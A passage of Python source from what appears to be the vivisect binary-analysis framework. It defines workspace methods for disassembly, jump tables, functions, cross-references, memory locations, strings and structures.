call them tables Foo and Bar, with Foo coming before Bar), and we see Foo first, we're going to
recognize Foo as being a giant table, with all of Bar overlapping with Foo
So we need to construct a list of now invalid references from prevRefVa, starting at newTablAddr
newTablAddr should point to the new jump table, and those new codeblock VAs should be removed from
the list of references that prevRefVa refs to (and delete the name)
We also need to check to see if the functions themselves line up (ie, do these two jump tables
even belong to the same function, or should we remove the code block from the function entirely?)
'''
# Due to how codeflow happens, we have no guarantee if these two adjacent jump tables are
# even in the same function
codeblocks = set()
curfva = self.getFunction(callingVa)
# collect all the entries for the new jump table
for cb in self.iterJumpTable(newTablAddr, rebase=rebase, step=psize):
codeblocks.add(cb)
prevcb = self.getCodeBlock(cb)
if prevcb is None:
continue
# we may also have to break these codeblocks from the old function
# 1 -- new func is none, old func is none
# * can't happen. if the codeblock is defined, we at least have an old function
# 2 -- new func is not none, old func is none
# * Can't happen. see above
# 3 -- new func is none, old func is not none
# * delete the codeblock. we've dropped into a new function that is different from the old
# since how codeflow discover functions, we should have all the code blocks for function
# 4 -- neither are none
# * moveCodeBlock -- that func will handle whether or not functions are the same
if curfva is not None:
self.moveCodeBlock(cb, curcb[CB_FUNCVA])
else:
self.delCodeBlock(prevcb[CB_VA])
# now delete those entries from the previous jump table
oldrefs = self.getXrefsFrom(prevRefVa)
todel = [xref for xref in self.getXrefsFrom(prevRefVa) if xref[1] in codeblocks]
for va in todel:
self.setComment(va[1], None)
self.delXref(va)
def makeJumpTable(self, op, tova, rebase=False, psize=4):
fname = self.getMemoryMap(tova)[3]
imgbase = self.getFileMeta(fname, 'imagebase')
ptrbase = tova
rdest = self.readMemValue(ptrbase, psize)
if rebase and rdest < imgbase:
rdest += imgbase
# if there's already an Xref to this address from another jump table, we overshot
# the other table, and need to cut that one short, delete its Xrefs starting at this one
# and then let the rest of this function build the new jump table
# This jump table also may not be in the same function as the other jump table, so we need
# to remove those codeblocks (and child codeblocks) from this function
# at this point, rdest should be the first codeblock in the jumptable, so get all the xrefs to him
# (but skipping over the current jumptable base address we're looking at)
for xrfrom, xrto, rtype, rflags in self.getXrefsTo(rdest):
if tova == xrfrom:
continue
refva, refsize, reftype, refinfo = self.getLocation(xrfrom)
if reftype != LOC_OP:
continue
# If we've already constructed this opcode location and made the xref to the new codeblock,
# that should mean we've already made the jump table, so there should be no need to split this
# jump table.
if refva == op.va:
continue
refop = self.parseOpcode(refva)
for refbase, refbflags in refop.getBranches():
if refbflags & envi.BR_TABLE:
self.splitJumpTable(op.va, refva, tova, psize=psize)
tabdone = {}
for i, rdest in enumerate(self.iterJumpTable(ptrbase, rebase=rebase, step=psize)):
if not tabdone.get(rdest):
tabdone[rdest] = True
self.addXref(op.va, rdest, REF_CODE, envi.BR_COND)
if self.getName(rdest) is None:
self.makeName(rdest, "case%d_%.8x" % (i, op.va))
else:
cmnt = self.getComment(rdest)
if cmnt is None:
self.setComment(rdest, "Other Case(s): %d" % i)
else:
cmnt += ", %d" % i
self.setComment(rdest, cmnt)
# This must be second (len(xrefsto))
self.addXref(op.va, tova, REF_PTR)
def makeOpcode(self, va, op=None, arch=envi.ARCH_DEFAULT):
"""
Create a single opcode location. If you have already parsed the
opcode object, you may pass it in.
"""
if op is None:
try:
op = self.parseOpcode(va, arch=arch)
except envi.InvalidInstruction as msg:
# FIXME something is just not right about this...
bytez = self.readMemory(va, 16)
logger.warning("Invalid Instruct Attempt At:", hex(va), binascii.hexlify(bytez))
raise InvalidLocation(va, msg)
except Exception as msg:
raise InvalidLocation(va, msg)
# Add our opcode location first (op flags become ldata)
loc = self.addLocation(va, op.size, LOC_OP, op.iflags)
# This takes care of all normal indirect immediates
brdone = {}
brlist = op.getBranches()
for tova, bflags in brlist:
# If there were unresolved dynamic branches, oh well...
if tova is None:
continue
if not self.isValidPointer(tova):
continue
brdone[tova] = True
# Special case, if it's a table branch, lets resolve it now.
if bflags & envi.BR_TABLE:
self.makeJumpTable(op, tova)
elif bflags & envi.BR_DEREF:
self.addXref(va, tova, REF_DATA)
ptrdest = None
if self.getLocation(tova) is None:
ptrdest = self.makePointer(tova, follow=False)
# If the actual dest is executable, make a code ref fixup
# which *removes* the deref flag...
if ptrdest and self.probeMemory(ptrdest[0], 1, e_mem.MM_EXEC):
self.addXref(va, ptrdest[0], REF_CODE, bflags & ~envi.BR_DEREF)
else:
self.addXref(va, tova, REF_CODE, bflags)
else:
# vivisect does NOT create REF_CODE entries for
# instruction fall through
if bflags & envi.BR_FALL:
continue
self.addXref(va, tova, REF_CODE, bflags)
# Check the instruction for static d-refs
for oidx, o in op.genRefOpers(emu=None):
# FIXME it would be nice if we could just do this one time
# in the emulation pass (or hint emulation that some have already
# been done.
# unfortunately, emulation pass only occurs for code identified
# within a marked function.
# future fix: move this all into VivCodeFlowContext.
# Does the operand touch memory ?
if o.isDeref():
ref = o.getOperAddr(op, None)
if brdone.get(ref, False):
continue
if ref is not None and self.isValidPointer(ref):
# It's a data reference. lets also check if the data is
# a pointer.
self.addXref(va, ref, REF_DATA)
# If we don't already know what type this location is,
# lets make it either a pointer or a number...
if self.getLocation(ref) is None:
offset, _ = self.getByteDef(ref)
val = self.parseNumber(ref, o.tsize)
# So we need the size check to avoid things like "aaaaa", maybe
# but maybe if we do something like the tsize must be either the
# target pointer size or in a set of them that the arch defines?
if (self.psize == o.tsize and self.isValidPointer(val)):
self.makePointer(ref, tova=val)
else:
self.makeNumber(ref, o.tsize)
else:
ref = o.getOperValue(op)
if brdone.get(ref, False):
continue
if ref is not None and type(ref) in (int, long) and self.isValidPointer(ref):
self.addXref(va, ref, REF_PTR)
return loc
def _dbgLocEntry(self, va):
"""
Display the human-happy version of a location
"""
loc = self.getLocation(va)
if loc is None:
return 'None'
lva, lsz, ltype, ltinfo = loc
ltvar = loc_lookups.get(ltype)
ltdesc = loc_type_names.get(ltype)
locrepr = '(0x%x, %d, %s, %r) # %s' % (lva, lsz, ltvar, ltinfo, ltdesc)
return locrepr
def updateCallsFrom(self, fva, ncalls):
function = self.getFunction(fva)
prev_call = self.getFunctionMeta(function, 'CallsFrom')
newcall = set(prev_call).union(set(ncalls))
self.setFunctionMeta(function, 'CallsFrom', list(newcall))
def makeCode(self, va, arch=envi.ARCH_DEFAULT, fva=None):
"""
Attempt to begin code-flow based disassembly by
starting at the given va. The va will be made into
an OpcodeLoc and refs will be walked continuing to
make code where possible.
"""
# If this is already a location, bail.
if self.isLocation(va):
return
calls_from = self.cfctx.addCodeFlow(va, arch=arch)
if fva is None:
self.setVaSetRow('CodeFragments', (va, calls_from))
else:
self.updateCallsFrom(fva, calls_from)
return calls_from
def previewCode(self, va, arch=envi.ARCH_DEFAULT):
'''
Show the repr of an instruction in the current canvas *before* making it that
'''
try:
op = self.parseOpcode(va, arch)
if op is None:
self.vprint("0x%x - None")
else:
self.vprint("0x%x (%d bytes) %s" % (va, len(op), repr(op)))
except Exception:
self.vprint("0x%x - decode exception" % va)
logger.exception("preview opcode exception:")
#################################################################
#
# Function API
#
def isFunction(self, funcva):
"""
Return True if funcva is a function entry point.
"""
return self.funcmeta.get(funcva) is not None
def isFunctionThunk(self, funcva):
"""
Return True if funcva is a function thunk
"""
# TODO: could we do more here?
try:
return self.getFunctionMeta(funcva, 'Thunk') is not None
except InvalidFunction:
return False
def getFunctions(self):
"""
Return a list of the function virtual addresses
defined in the workspace.
"""
return self.funcmeta.keys()
def getFunction(self, va):
"""
Return the VA for this function. This will search code blocks
and check for a function va.
"""
if self.funcmeta.get(va) is not None:
return va
cbtup = self.getCodeBlock(va)
if cbtup is not None:
return cbtup[CB_FUNCVA]
return None
def makeFunction(self, va, meta=None, arch=envi.ARCH_DEFAULT):
"""
Do parsing for function information and add a new function doodad.
This function should probably only be called once code-flow for the
area is complete.
"""
if self.isFunction(va):
return
if not self.isValidPointer(va):
raise InvalidLocation(va)
loc = self.getLocation(va)
if loc is not None and loc[L_TINFO] is not None and loc[L_LTYPE] == LOC_OP:
arch = loc[L_TINFO]
realfva = self.cfctx.addEntryPoint(va, arch=arch)
if meta is not None:
for key, val in meta.items():
self.setFunctionMeta(realfva, key, val)
return realfva
def delFunction(self, funcva):
"""
Remove a function, it's code blocks and all associated meta
"""
if self.funcmeta.get(funcva) is None:
raise InvalidLocation(funcva)
self._fireEvent(VWE_DELFUNCTION, funcva)
def setFunctionArg(self, fva, idx, atype, aname):
'''
Set the name and type information for a single function arguemnt by index.
Example:
# If we were setting up main...
vw.setFunctionArg(fva, 0, 'int','argc')
vw.setFunctionArg(fva, 1, 'char **','argv')
'''
rettype,retname,callconv,callname,callargs = self.getFunctionApi(fva)
while len(callargs) <= idx:
callargs.append( ('int','arg%d' % len(callargs)) )
callargs[idx] = (atype,aname)
self.setFunctionApi(fva, (rettype,retname,callconv,callname,callargs))
def getFunctionArgs(self, fva):
'''
Returns the list of (typename,argname) tuples which define the
arguments for the specified function.
Example:
for typename,argname in vw.getFunctionArgs(fva):
print('Takes: %s %s' % (typename,argname))
'''
rettype,retname,callconv,callname,callargs = self.getFunctionApi(fva)
return list(callargs)
def getFunctionApi(self, fva):
'''
Retrieve the API definition for the given function address.
Returns: an API tuple (similar to impapi subsystem) or None
( rettype, retname, callconv, funcname, ( (argtype, argname), ...) )
'''
ret = self.getFunctionMeta(fva, 'api')
if ret is not None:
return ret
defcall = self.getMeta('DefaultCall','unkcall')
return ('void',None,defcall,None,())
def setFunctionApi(self, fva, apidef):
'''
Set a function's API definition.
NOTE: apidef is a tuple similar to the impapi subsystem
( rettype, retname, callconv, funcname, ( (argtype, argname), ...) )
Example:
apidef = ('int','size','stdcall','getThingSize', ( ('void *','thing'), ))
vw.setFunctionApi(fva, apidef)
'''
self.setFunctionMeta(fva, 'api', apidef)
def getFunctionLocals(self, fva):
'''
Retrieve the list of (fva,spdelta,symtype,syminfo) tuples which
represent the given function's local memory offsets.
'''
if not self.isFunction(fva):
raise InvalidFunction(fva)
return self.localsyms[fva].values()
def getFunctionLocal(self, fva, spdelta):
'''
Retrieve a function local symbol definition as a
(typename,symname) tuple or None if not found.
NOTE: If the local symbol references a LSYM_FARG, this API
will resolve the argument name/type from the function API
definition.
Example:
locsym = vw.getFunctionLocal(fva, 8)
if locsym:
symtype,symname = locsym
print('%s %s;' % (symtype,symname))
'''
locsym = self.localsyms[fva].get(spdelta)
if locsym is None:
return None
fva,spdelta,symtype,syminfo = locsym
if symtype == LSYM_NAME:
return syminfo
if symtype == LSYM_FARG:
apidef = self.getFunctionApi(fva)
if apidef is None:
return None
funcargs = apidef[-1]
if syminfo >= len(funcargs):
return None
return funcargs[syminfo]
raise Exception('Unknown Local Symbol Type: %d' % symtype)
def setFunctionLocal(self, fva, spdelta, symtype, syminfo):
'''
Assign a local symbol within a function (addressed
by delta from initial sp). For each symbol, a "symtype"
and "syminfo" field are used to specify the details.
Example:
# Setup a regular local integer
vw.setFunctionLocal(fva, -4, LSYM_NAME, ('int','x'))
# Setup a link to a stack argument... (ie. i386 cdecl)
vw.setFunctionLocal(fva, 4, LSYM_FARG, 0)
# Setup amd64 style shadow space
vw.setFunctionLocal(fva, 8, LSYM_NAME, ('void *','shadow0'))
'''
metaname = 'LocalSymbol:%d' % spdelta
metavalue = (fva,spdelta,symtype,syminfo)
self.setFunctionMeta(fva, metaname, metavalue)
def setFunctionMeta(self, funcva, key, value):
"""
Set meta key,value pairs that describe a particular
function (by funcva).
Example: vw.setFunctionMeta(fva, "WootKey", 10)
"""
if not self.isFunction(funcva):
raise InvalidFunction(funcva)
self._fireEvent(VWE_SETFUNCMETA, (funcva, key, value))
def getFunctionMeta(self, funcva, key, default=None):
m = self.funcmeta.get(funcva)
if m is None:
raise InvalidFunction(funcva)
return m.get(key, default)
def getFunctionMetaDict(self, funcva):
"""
Return the entire dictionary of function metadata
for the function specified at funcva
"""
return self.funcmeta.get(funcva)
def getFunctionBlocks(self, funcva):
"""
Return the code-block objects for the given function va
"""
ret = self.codeblocks_by_funcva.get(funcva)
if ret is None:
ret = []
return ret
def makeFunctionThunk(self, fva, thname, addVa=True, filelocal=False):
"""
Inform the workspace that a given function is considered a "thunk" to another.
This allows the workspace to process argument inheritance and several other things.
Usage: vw.makeFunctionThunk(0xvavavava, "kernel32.CreateProcessA")
"""
self.checkNoRetApi(thname, fva)
self.setFunctionMeta(fva, "Thunk", thname)
n = self.getName(fva)
base = thname.split(".")[-1]
if addVa:
name = "%s_%.8x" % (base,fva)
else:
name = base
newname = self.makeName(fva, name, filelocal=filelocal, makeuniq=True)
api = self.getImpApi(thname)
if api:
# Set any argument names that are None
rettype,retname,callconv,callname,callargs = api
callargs = [ callargs[i] if callargs[i][1] else (callargs[i][0],'arg%d' % i) for i in range(len(callargs)) ]
self.setFunctionApi(fva, (rettype,retname,callconv,callname,callargs))
def getCallers(self, va):
'''
Get the va for all the callers of the given function/import.
Example:
for va in vw.getCallers( importva ):
dostuff(va)
'''
ret = []
for fromva, tova, rtype, rflags in self.getXrefsTo(va, rtype=REF_CODE):
if rflags & envi.BR_PROC:
ret.append(fromva)
return ret
def getCallGraph(self):
'''
Retrieve a visgraph Graph object representing all known inter procedural
branches in the workspace. Each node has an ID that is the same as the
function va.
Example:
graph = vw.getCallGraph()
'''
return self._call_graph
def getFunctionGraph(self, fva):
'''
Retrieve a code-block graph for the specified virtual address.
Procedural branches (ie, calls) will not be followed during graph
construction.
'''
return viv_codegraph.FuncBlockGraph(self,fva)
def getImportCallers(self, name):
"""
Get a list of all the callers who reference the specified import
by name. (If we detect that the name is actually *in* our workspace,
return those callers too...
"""
ret = []
# If it's a local function, do that too..
fva = self.vaByName(name)
if fva is not None and self.isFunction(fva):
ret = self.getCallers(fva)
for fva in self.getFunctions():
if self.getFunctionMeta(fva, 'Thunk') == name:
ret.extend( self.getCallers( fva ) )
for lva,lsize,ltype,tinfo in self.getLocations(LOC_IMPORT):
if tinfo == name:
ret.extend( self.getCallers( lva ) )
return ret
#################################################################
#
# Xref API
#
def getXrefs(self, rtype=None):
"""
Return the entire list of XREF tuples for this workspace.
"""
if rtype:
return [ xtup for xtup in self.xrefs if xtup[XR_RTYPE] == rtype ]
return self.xrefs
def getXrefsFrom(self, va, rtype=None):
"""
Return a list of tuples for the xrefs whose origin is the
specified va. Optionally, only return xrefs whose type
field is rtype if specified.
example:
for fromva, tova, rtype, rflags in vw.getXrefsFrom(0x41414141):
dostuff(tova)
"""
ret = []
xrefs = self.xrefs_by_from.get(va, None)
if xrefs is None:
return ret
if rtype is None:
return xrefs
return [ xtup for xtup in xrefs if xtup[XR_RTYPE] == rtype ]
def getXrefsTo(self, va, rtype=None):
"""
Get a list of xrefs which point to the given va. Optionally,
specify an rtype to get only xrefs of that type.
"""
# FIXME make xrefs use MapLookup!
ret = []
xrefs = self.xrefs_by_to.get(va, None)
if xrefs is None:
return ret
if rtype is None:
return xrefs
return [ xtup for xtup in xrefs if xtup[XR_RTYPE] == rtype ]
def addMemoryMap(self, va, perms, fname, bytes):
"""
Add a memory map to the workspace. This is the *only* way to
get memory backings into the workspace.
"""
self._fireEvent(VWE_ADDMMAP, (va, perms, fname, bytes))
def delMemoryMap(self, va):
raise "OMG"
def addSegment(self, va, size, name, filename):
"""
Add a "segment" to the workspace. A segment is generally some meaningful
area inside of a memory map. For PE binaries, a segment and a memory map
are synonymous. However, some platforms (Elf) specify their memory maps
(program headers) and segments (sectons) seperately.
"""
self._fireEvent(VWE_ADDSEGMENT, (va,size,name,filename))
def getSegment(self, va):
"""
Return the tuple representation of a segment. With the
following format:
(va, size, name, filename)
"""
for seg in self.segments:
sva, ssize, sname, sfile = seg
if va >= sva and va < (sva + ssize):
return seg
return None
def getSegments(self):
"""
Return a list of segment tuples (see getSegment) for all
the segments defined in the current worksace
"""
return list(self.segments)
def addCodeBlock(self, va, size, funcva):
"""
Add a region of code which belongs to a function. Code-block boundaries
are at all logical branches and have more in common with a logical
graph view than function chunks.
"""
loc = self.getLocation( va )
if loc is None:
raise Exception('Adding Codeblock on *non* location?!?: 0x%.8x' % va)
self._fireEvent(VWE_ADDCODEBLOCK, (va,size,funcva))
def getCodeBlock(self, va):
"""
Return the codeblock which contains the given va. A "codeblock"
is a location compatable tuple: (va, size, funcva)
"""
return self.blockmap.getMapLookup(va)
def delCodeBlock(self, va):
"""
Remove a code-block definition from the codeblock namespace.
"""
cb = self.getCodeBlock(va)
if cb is None:
raise Exception("Unknown Code Block: 0x%x" % va)
self._fireEvent(VWE_DELCODEBLOCK, cb)
def getCodeBlocks(self):
"""
Return a list of all the codeblock objects.
"""
return list(self.codeblocks)
def addXref(self, fromva, tova, reftype, rflags=0):
"""
Add an xref with the specified fromva, tova, and reftype
(see REF_ macros). This will *not* trigger any analysis.
Callers are expected to do their own xref analysis (ie, makeCode() etc)
"""
# Architecture gets to decide on actual final VA (ARM/THUMB/etc...)
tova, reftype, rflags = self.arch.archModifyXrefAddr(tova, reftype, rflags)
ref = (fromva, tova, reftype, rflags)
if ref in self.getXrefsFrom(fromva):
return
self._fireEvent(VWE_ADDXREF, (fromva, tova, reftype, rflags))
def delXref(self, ref):
"""
Remove the given xref. This *will* exception if the
xref doesn't already exist...
"""
if ref not in self.getXrefsFrom(ref[XR_FROM]):
raise Exception("Unknown Xref: %x %x %d" % ref)
self._fireEvent(VWE_DELXREF, ref)
def analyzePointer(self, va):
"""
Assume that a new pointer has been created. Check if it's
target has a defined location and if not, try to figure out
wtf is there... Will return the location type of the location
it recommends or None if a location is already there or it has
no idea.
"""
if self.getLocation(va) is not None:
return None
if self.isProbablyString(va):
return LOC_STRING
elif self.isProbablyUnicode(va):
return LOC_UNI
elif self.isProbablyCode(va):
return LOC_OP
return None
def getMeta(self, name, default=None):
return self.metadata.get(name, default)
def setMeta(self, name, value):
"""
Set a meta key,value pair for this workspace.
"""
self._fireEvent(VWE_SETMETA, (name,value))
def markDeadData(self, start, end):
"""
mark a virtual range as dead code.
"""
self.setMeta("deaddata:0x%08x" % start, (start, end))
def unmarkDeadData(self, start, end):
"""
unmark a virtual range as dead code
"""
self._dead_data.remove( (start,end) )
def _mcb_deaddata(self, name, value):
"""
callback from setMeta with namespace
deaddata:
that indicates a range has been added
as dead data.
"""
if value not in self._dead_data:
self._dead_data.append( value )
def isDeadData(self, va):
"""
Return boolean indicating va is in
a dead data range.
"""
for start,end in self._dead_data:
if va >= start and va <= end:
return True
return False
def initMeta(self, name, value):
"""
Set a metakey ONLY if it is not already set. Either
way return the value of the meta key.
"""
m = self.getMeta(name)
if m is None:
self.setMeta(name, value)
m = value
return m
def getTransMeta(self, mname, default=None):
'''
Retrieve a piece of "transient" metadata which is *not*
stored across runs or pushed through the event subsystem.
'''
return self.transmeta.get(mname,default)
def setTransMeta(self, mname, value):
'''
Store a piece of "transient" metadata which is *not*
stored across runs or pushed through the event subsystem.
'''
self.transmeta[mname] = value
def castPointer(self, va):
"""
Return the value for a pointer in memory at
the given location. This method does NOT
create a location object or do anything other
than parse memory.
"""
offset, bytes = self.getByteDef(va)
return e_bits.parsebytes(bytes, offset, self.psize, bigend=self.bigend)
def makePointer(self, va, tova=None, follow=True):
"""
Create a new pointer location in the workspace. If you have already
parsed out the pointers value, you may specify tova to speed things
up.
"""
loctup = self.getLocation(va)
if loctup is not None:
logger.warn("0x%x: Attempting to make a Pointer where another location object exists (of type %r)", va, self.reprLocation(loctup))
return None
psize = self.psize
# Get and document the xrefs created for the new location
if tova is None:
tova = self.castPointer(va)
self.addXref(va, tova, REF_PTR)
ploc = self.addLocation(va, psize, LOC_POINTER)
if follow and self.isValidPointer(tova):
self.followPointer(tova)
return ploc
def makePad(self, va, size):
"""
A special utility for making a pad of a particular size.
"""
return self.addLocation(va, size, LOC_PAD, None)
def makeNumber(self, va, size, val=None):
"""
Create a number location in memory of the given size.
(you may specify val if you have already parsed the value
from memory and would like to save CPU cycles)
"""
return self.addLocation(va, size, LOC_NUMBER, None)
def parseNumber(self, va, size):
'''
Parse a <size> width numeric value from memory at <va>.
Example:
val = vw.parseNumber(0x41414140, 4)
'''
offset, bytes = self.getByteDef(va)
return e_bits.parsebytes(bytes, offset, size, bigend=self.bigend)
def _getSubstrings(self, va, size, ltyp):
# rip through the desired memory range to populate any substrings
subs = set()
end = va + size
for offs in range(va, end, 1):
loc = self.getLocation(offs, range=True)
if loc and loc[L_LTYPE] == LOC_STRING and loc[L_VA] > va:
subs.add((loc[L_VA], loc[L_SIZE]))
if loc[L_TINFO]:
subs = subs.union(set(loc[L_TINFO]))
return list(subs)
def _getStrTinfo(self, va, size, subs):
ploc = self.getLocation(va, range=False)
if ploc:
# the string we're making is a substring of some outer one
# still make this string location, but let the parent know about us too and our
# children as well. Ultimately, the outermost parent should be responsible for
# knowing about all it's substrings
modified = False
pva, psize, ptype, pinfo = ploc
if ptype not in (LOC_STRING, LOC_UNI):
return subs
if (va, size) not in pinfo:
modified = True
pinfo.append((va, size))
for sva, ssize in subs:
if (sva, ssize) not in pinfo:
modified = True
pinfo.append((sva, ssize))
if modified:
tinfo = pinfo
else:
tinfo = subs
return tinfo
def makeString(self, va, size=None):
"""
Create a new string location at the given VA. You may optionally
specify size. If size==None, the string will be parsed as a NULL
terminated ASCII string.
Substrings are also handled here. Generally, the idea is:
* if the memory range is completey undefined, we just create a new string at the VA specified (provided that asciiStringSize return a size greater than 0 or the parameter size is greater than 0)
* if we create a string A at virtual address 0x40 with size 20, and then later a string B at virtual
address 0x44, we won't actually make a new location for the string B, but rather add info to the
tinfo portion of the location tuple for string A, and when trying to retrieve string B via getLocation,
we'll make up a (sort of) fake location tuple for string B, provided that range=True is passed to
getLocation
* if we create string A at virtual address 0x40, and then later a string B at virtual 0x30
that has a size of 16 or more, we overwrite the string A with the location information for string B,
and demote string A to being a tuple of (VA, size) inside of string B's location information.
This method only captures suffixes, but perhaps in the future we'll have symbolik resolution that can
capture true substrings that aren't merely suffixes.
This same formula is applied to unicode detection as well
"""
if size is None:
size = self.asciiStringSize(va)
if size <= 0:
raise Exception("Invalid String Size: %d" % size)
# rip through the desired memory range to populate any substrings
subs = self._getSubstrings(va, size, LOC_STRING)
tinfo = self._getStrTinfo(va, size, subs)
if self.getName(va) is None:
m = self.readMemory(va, size-1).replace("\n", "")
self.makeName(va, "str_%s_%.8x" % (m[:16],va))
return self.addLocation(va, size, LOC_STRING, tinfo=tinfo)
def makeUnicode(self, va, size=None):
if size is None:
size = self.uniStringSize(va)
if size <= 0:
raise Exception("Invalid Unicode Size: %d" % size)
subs = self._getSubstrings(va, size, LOC_UNI)
tinfo = self._getStrTinfo(va, size, subs)
if self.getName(va) is None:
m = self.readMemory(va, size-1).replace("\n","").replace("\0","")
self.makeName(va, "wstr_%s_%.8x" % (m[:16],va))
return self.addLocation(va, size, LOC_UNI, tinfo=tinfo)
def addConstModule(self, modname):
'''
Add constants declared within the named module
to the constants resolver namespace.
Example: vw.addConstModule('vstruct.constants.ntstatus')
'''
mod = self.loadModule(modname)
self.vsconsts.addModule(mod)
def addStructureModule(self, namespace, modname):
'''
Add a vstruct structure module to the workspace with the given
namespace.
Example: vw.addStructureModule('ntdll', 'vstruct.defs.windows.win_5_1_i386.ntdll')
This allows subsequent struct lookups by names like
'''
mod = self.loadModule(modname)
self.vsbuilder.addVStructNamespace(namespace, mod)
def getStructure(self, va, vstructname):
"""
Parse and return a vstruct object for the given name. This
(like parseOpcode) does *not* require that the location be a struct
and will not create one (use makeStructure).
"""
s = vstruct.getStructure(vstructname)
if s is None:
s = self.vsbuilder.buildVStruct(vstructname)
if s is not None:
bytes = self.readMemory(va, len(s))
s.vsParse(bytes)
return s
def makeStructure(self, va, vstructname, vs=None):
"""
Make a location which is a structure and will be parsed/accessed
by vstruct. You must specify the vstruct name for the structure
you wish to have at the location. Returns a vstruct from the
location.
"""
if vs is None:
vs = self.getStructure(va, vstructname)
self.addLocation(va, len(vs), LOC_STRUCT, vstructname)
# Determine if there are any pointers we need make
# xrefs for...
offset = 0
for p in vs.vsGetPrims():
if isinstance(p, vs_prims.v_ptr):
vptr = p.vsGetValue()
if self.isValidPointer(vptr):
self.addXref(va+offset, vptr, REF_PTR)
offset += len(p)
return vs
def getUserStructNames(self):
'''
Retrive the list of the existing user-defined structure
names.
Example:
for name in vw.getUserStructNames():
print('Structure Name: %s' % name)
'''
return self.vsbuilder.getVStructCtorNames()
def getUserStructSource(self, sname):
'''
Get the source code (as a string) for the given user
defined structure.
Example:
ssrc = vw.getUserStructSource('MyStructureThing')
'''
return self.getMeta('ustruct:%s' % sname)
def setUserStructSource(self, ssrc):
'''
Save the input string as a C structure definition for the
workspace. User-defined structures may then be applied
to locations, or further edited in the future.
Example:
src = "struct woot { int x; int y; };"
vw.setUserStructSource( src )
'''
# First, we make sure it compiles...
ctor = vs_cparse.ctorFromCSource( ssrc )
# Then, build one to get the name from it...
vs = ctor()
cname = vs.vsGetTypeName()
self.setMeta('ustruct:%s' % cname, ssrc)
return cname
def asciiStringSize(self, va):
"""
Return the size (in bytes) of the ascii string
at the specified location (or -1 if no terminator
is found in the memory map)
"""
offset, bytez = self.getByteDef(va)
foff = bytez.find('\x00', offset)
if foff == -1:
return foff
return (foff - offset) + 1
def uniStringSize(self, va):
"""
Return the size (in bytes) of the unicode string
at the specified location (or -1 if no terminator
is found in the memory map)
"""
offset, bytez = self.getByteDef(va)
foff = bytez.find('\x00\x00', offset)
if foff == -1:
return foff
return (foff - offset) + 2
def addLocation(self, va, size, ltype, tinfo=None):
"""
Add a location tuple.
"""
ltup = (va, size, ltype, tinfo)
#loc = self.locmap.getMapLookup(va)
#if loc is not None:
#raise Exception('Duplicate Location: (is: %r wants: %r)' % (loc,ltup))
self._fireEvent(VWE_ADDLOCATION, ltup)
return ltup
def getLocations(self, ltype=None, linfo=None):
"""
Return a list of location objects from the workspace
of a particular type.
"""
if ltype is None:
return list(self.loclist)
if linfo is None:
return [ loc for loc in self.loclist if loc[2] == ltype ]
return [ loc for loc in self.loclist if (loc[2] == ltype and loc[3] == linfo) ]
def isLocation(self, va, range=False):
"""
Return True if the va represents a location already.
"""
if self.getLocation(va, range=range) is not None:
return True
return False
def isLocType(self, va, ltype):
"""
You may use this to test if a given VA represents
a location of the specified type.
example:
if vw.isLocType(0x41414141, LOC_STRING):
print("string at: 0x41414141")
"""
tup = self.getLocation(va)
if tup is None:
return False
return tup[L_LTYPE] == ltype
def getLocation(self, va, range=True):
"""
Return the va,size,ltype,tinfo tuple for the given location.
(specify range=True to potentially match a va that is inside
a location rather than the beginning of one, this behavior
only affects strings/substring retrieval currently)
"""
loc = self.locmap.getMapLookup(va)
if not loc:
return loc
if range and loc[L_LTYPE] in (LOC_STRING, LOC_UNI):
# dig into any sublocations that may have been created, trying to find the best match
# possible, where "best" means the substring that both contains the va, and has no substrings
# that contain the va.
if not loc[L_TINFO]:
return loc
subs = sorted(loc[L_TINFO], key=lambda k: k[0], reverse=False)
ltup = loc
for sva, ssize in subs:
if sva <= va < sva + ssize:
ltup = (sva, ssize, loc[L_LTYPE], [])
return ltup
else:
return loc
def getLocationRange(self, va, size):
"""
A "location range" is a list of location tuples where
undefined space *will* be represented by LOC_UNDEF tuples
to provide a complete accounting of linear workspace.
"""
ret = []
endva = va+size
undefva = None
while va < endva:
ltup = self.getLocation(va)
if ltup is None:
if undefva is None:
undefva = va
va += 1
else:
if undefva is not None:
ret.append((undefva, va-undefva, LOC_UNDEF, None))
undefva = None
ret.append(ltup)
va += ltup[L_SIZE]
# Mop up any hanging udefs
if undefva is not None:
ret.append((undefva, va-undefva, LOC_UNDEF, None))
return ret
def delLocation(self, va):
"""
Delete the given Location object from the binary
(removes any xrefs/etc for the location as well)
This will raise InvalidLocation if the va is not
an exact match for the beginning of a location.
"""
loc = self.getLocation(va)
if loc is None:
raise InvalidLocation(va)
# remove xrefs from this location
for xref in self.getXrefsFrom(va):
self.delXref(xref)
self._fireEvent(VWE_DELLOCATION, loc)
def getRenderInfo(self, va, size):
"""
Get nearly everything needed to render a workspace area
to a display. This function *greatly* speeds up interface
code and is considered "tightly coupled" with the asmview
code. (and is therefore subject to change).
"""
locs = []
funcs = {}
names = {}
comments = {}
extras = {}
for loc in self.getLocationRange(va, size):
lva, lsize, ltype, tinfo = loc
locs.append(loc)
name = self.getName(lva)
isfunc = self.isFunction(lva)
cmnt = self.getComment(lva)
if name is not None:
names[lva] = name
if isfunc == True:
funcs[lva] = True
if cmnt is not None:
comments[lva] = cmnt
if ltype == LOC_UNDEF:
# Expand out all undefs so we can send all the info
endva = lva + lsize
while lva < endva:
uname = self.getName(lva)
ucmnt = self.getComment(lva)
if uname is not None:
names[lva] = uname
if ucmnt is not None:
comments[lva] = ucmnt
#ret.append(((lva, 1, LOC_UNDEF, None), self.getName(lva), False, self.getComment(lva)))
lva += 1
elif ltype == LOC_OP:
extras[lva] = self.parseOpcode(lva)
elif ltype == LOC_STRUCT:
extras[lva] = self.getStructure(lva, tinfo)
return locs, funcs, names, comments, extras
def getPrevLocation(self, va, adjacent=True):
"""
Get the previous location behind this one. If adjacent
is true, only return a location which is IMMEDIATELY behind
the given va, otherwise search backward for a location until
you find one or hit the edge of the segment.
"""
va -= 1
ret = self.locmap.getMapLookup(va)
if ret is not None:
return ret
if adjacent:
return None
va -= 1
while va > 0:
ret = self.locmap.getMapLookup(va)
if ret is not None:
return ret
va -= 1
return None
def vaByName(self, name):
return self.va_by_name.get(name, None)
def getLocationByName(self, name):
"""
Return a location object by the name of the
location.
"""
va = self.vaByName(name)
if va is None:
raise InvalidLocation(0, "Unknown Name: %s" % name)
return self.getLocation(va)
def getNames(self):
"""
Return a list of tuples containing (va, name)
"""
return self.name_by_va.items()
def getName(self, va, smart=False):
'''
Returns the name of the specified virtual address (or None).
Smart mode digs beyond simple name lookups, as follows:
